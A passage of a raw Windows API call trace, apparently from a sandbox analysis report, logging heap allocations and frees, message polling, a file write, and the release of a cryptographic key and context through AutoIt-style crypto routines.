dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f39408 | out: hHeap=0x970000) returned 1 [0268.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0268.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe73438 | out: hHeap=0x970000) returned 1 [0268.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0268.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0268.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f27a10 | out: hHeap=0x970000) returned 1 [0268.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0268.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119f0) returned 0xe50048 [0268.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe84e30 | out: hHeap=0x970000) returned 1 [0268.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.514] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0268.514] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0268.514] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0268.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0268.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119f0) returned 0x2f16018 [0268.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.517] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f16018*, nNumberOfBytesToWrite=0x119f0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f16018*, lpNumberOfBytesWritten=0x8cf5e4*=0x119f0, lpOverlapped=0x0) returned 1 [0268.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0268.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0268.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0268.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0268.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0268.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0268.520] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0268.520] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0268.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.521] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.521] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0268.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0268.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51a60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0268.522] CryptDestroyKey (hKey=0xa87510) returned 1 [0268.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0268.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0268.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0268.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0268.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.522] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.522] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.522] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0268.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0268.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.523] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.523] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0268.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.523] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0268.523] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0268.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.523] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.523] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.523] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0268.524] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0268.524] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0268.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.524] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.524] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.524] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.524] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0268.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0268.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.524] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0268.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.524] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.524] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0268.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0268.525] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.525] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.525] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0268.525] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.525] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0268.525] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0268.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0268.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.525] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0268.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0268.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0268.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.526] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0268.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0268.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0268.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0268.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0268.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0268.528] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.528] RtlAllocateHeap 